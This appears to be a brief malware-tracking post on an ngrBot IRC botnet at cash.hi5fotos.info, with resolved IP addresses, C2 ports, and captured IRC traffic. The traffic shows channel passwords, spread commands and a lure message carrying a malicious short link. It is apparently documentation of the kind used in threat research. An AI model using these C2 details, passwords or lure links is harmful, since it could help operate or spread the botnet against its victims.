cash.hi5fotos.info (ngrBot hosted in China Wuhan Niantong)

Resolved : [cash.hi5fotos.info] To [61.31.99.67]
Resolved : [cash.hi5fotos.info] To [64.69.44.51]
Resolved : [cash.hi5fotos.info] To [58.19.130.52]

Remote Host      Port Number
195.122.131.7    80
199.15.234.7     80
64.62.243.90     80
58.19.130.52     4042   PASS ngrBot or PASS owned
64.69.44.51      4042   PASS ngrBot or PASS owned
61.31.99.67      4042   PASS ngrBot or PASS owned

JOIN #US
PRIVMSG #boss :[d=”http://tinyurl.com/434fj6q”] Error downloading file [e=”12039″]
NICK n{US|XPa}xnkupbh
USER xnkupbh 0 0 :xnkupbh
JOIN #boss ngrBot
PRIVMSG #boss :[HTTP]: Updated HTTP spread interval to “6”
PRIVMSG #boss :[HTTP]: Updated HTTP spread message to “wow, haha http://is.gd/facebook_photoalbum_10_08_2011_jpg”
PRIVMSG #boss :[MSN]: Updated MSN spread interval to “6”
PRIVMSG #boss :[MSN]: Updated MSN spread message to “wow, haha http://is.gd/facebook_photoalbum_10_08_2011_jpg”

PONG 22 MOTD
PRIVMSG #biz# :msn// Thread Disabled.
PRIVMSG #biz# :msn// Thread Activated: Sending Message.
NICK [00|USA|958672]
USER XP-0694 * 0 :COMPUTERNAME
MODE [00|USA|958672] -ix
JOIN #biz# abc

Probably 30k or more inside this botnet.

Hosting info:
http://whois.domaintools.com/58.19.130.52
